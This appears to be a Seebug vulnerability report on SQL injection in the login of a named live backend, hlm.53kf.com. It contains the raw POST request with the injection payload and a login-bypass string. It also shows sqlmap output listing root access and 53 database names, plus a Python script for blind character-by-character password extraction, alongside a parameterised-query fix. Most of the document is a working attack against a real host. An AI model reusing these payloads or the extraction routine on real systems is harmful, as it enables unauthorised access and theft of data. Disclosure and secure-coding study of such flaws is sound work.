MySQL blind injection (root) in a 53KF backend

2015-05-19T00:00:00
ID SSV:94377
Type seebug
Reporter Root
Modified 2015-05-19T00:00:00

Description

Summary:

MySQL blind injection (root) in a 53KF backend

Details:

Injection point:

POST /check.php HTTP/1.1
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://hlm.53kf.com
Host: hlm.53kf.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*

Submit=&action=login&name=admin' or 1=1* or '1aa'='1&pwd=test

The name parameter is injectable. It is a very plain injection, yet sqlmap with --risk=3 still failed to detect it, so I rewrote the parameter to make the injection point more explicit (the * is sqlmap's marker for a custom injection point, so its payloads are inserted right after the true condition 1=1):

admin' or 1=1* or '1aa'='1

Proof of vulnerability:

Entering admin' or 1=1 or '1'='-- as the user name logs straight into the backend (the trailing -- ends up inside the closing quote, so the injected condition simply reads name='admin' or 1=1 or '1'='--' and is true for every row):

[Image: 53kf.png (https://images.seebug.org/upload/201505/19211236bc51c5bf24c0d02c8c96cccc0dc3f7a6.png)]
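The report does not show check.php's query, so the following is an added example, not code from the report or from 53KF. It reconstructs a hypothetical login check of the shape the payload implies (user name and password concatenated into a WHERE clause), shows that the admin' or 1=1 or '1'='-- payload from the proof above bypasses it while a parameterised version treats the payload as data, and then goes one step further than the page: it recovers a password character by character through the same injection point with boolean probes, which is the blind technique sqlmap used to enumerate the 53 databases. The table, the two sample accounts and the s3cret password are constructed; SQLite stands in for MySQL (substr/length instead of SUBSTRING/LENGTH).

```python
import sqlite3
import string

# Constructed sample data, not from the report: a tiny stand-in for the 53KF
# backend's user table, whose real schema the report does not show.
SAMPLE_USERS = [("admin", "s3cret"), ("operator", "hunter2")]


def make_db():
    """In-memory SQLite database seeded with the constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, name, pwd):
    """Hypothetical reconstruction of a check.php-style login query built by
    string concatenation (the real query is not in the report).
    Returns the matched user name, or None when no row matches."""
    sql = ("SELECT name FROM users WHERE name='" + name
           + "' AND pwd='" + pwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, name, pwd):
    """The same check with bound parameters: quotes in the input are
    compared as characters of the user name, never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name=? AND pwd=?"
    row = conn.execute(sql, (name, pwd)).fetchone()
    return row[0] if row else None


def blind_probe(conn, condition):
    """Boolean-based blind probe through the vulnerable login.
    name = admin' AND (<cond>) OR '1'='2  produces
      WHERE name='admin' AND (<cond>) OR '1'='2' AND pwd='x'
    and because AND binds tighter than OR this is true exactly when
    <cond> holds, so a returned row means 'true'."""
    name = "admin' AND (" + condition + ") OR '1'='2"
    return login_vulnerable(conn, name, "x") is not None


def extract_password_blind(conn, user="admin", max_len=32):
    """Recover a password one character at a time with blind probes, the way
    sqlmap's boolean-based technique does. SQLite's substr/length are used;
    MySQL spells them SUBSTRING/LENGTH. Quote and backslash are skipped so
    every constructed probe stays a well-formed string literal."""
    target = "(SELECT pwd FROM users WHERE name='" + user + "')"
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the recovered prefix is the whole secret.
        if blind_probe(conn, "length(" + target + ")=" + str(pos - 1)):
            break
        for ch in string.printable:
            if ch in "'\\":
                continue
            probe = "substr(" + target + "," + str(pos) + ",1)='" + ch + "'"
            if blind_probe(conn, probe):
                recovered += ch
                break
        else:
            break  # no candidate matched this position; give up
    return recovered


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 or '1'='--"  # the payload from the report
    print("vulnerable login   :", login_vulnerable(db, payload, "test"))
    print("parameterized login:", login_parameterized(db, payload, "test"))
    print("blind extraction   :", extract_password_blind(db))
```

The blind extraction needs one request per candidate character per position; sqlmap does the same with a binary search over character codes, which is why it can dump 53 database names through a login form without ever seeing query output.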

Running sqlmap against it:

current user: 'root@localhost'
current database: 'hlm'
available databases [53]:
[*] `13jian`
[*] bak
[*] entalk
[*] hk_kf
[*] hk_kf1
[*] hk_talk
[*] hlm
[*] income
[*] information_schema
[*] ip
[*] ip2
[*] ip_110711
[*] ip_src
[*] kf
[*] kf1
[*] mysql
[*] oem
[*] oem_168kf_kf
[*] oem_168kf_kf1
[*] oem_168kf_talk
[*] oem_del
[*] oem_ekt_kf
[*] oem_ekt_kf1
[*] oem_ekt_talk
[*] oem_old
[*] oem_test
[*] oem_tzchat_kf
[*] oem_tzchat_kf1
[*] oem_tzchat_kf1_new
[*] oem_tzchat_kf_new
[*] oem_tzchat_talk
[*] oem_tzchat_talk_new
[*] oem_wb_kf
[*] oem_wb_kf1
[*] oem_wb_talk
[*] oem_yitian_kf
[*] oem_yitian_kf1
[*] oem_yitian_kf1_new
[*] oem_yitian_kf_new
[*] oem_yitian_talk
[*] oem_yitian_talk_new
[*] oem_ywdj_kf
[*] oem_ywdj_kf1
[*] oem_ywdj_talk
[*] srv_kf
[*] srv_kf1
[*] srv_talk
[*] stat
[*] talk
[*] test
[*] tw
[*] tw1
[*] twtalk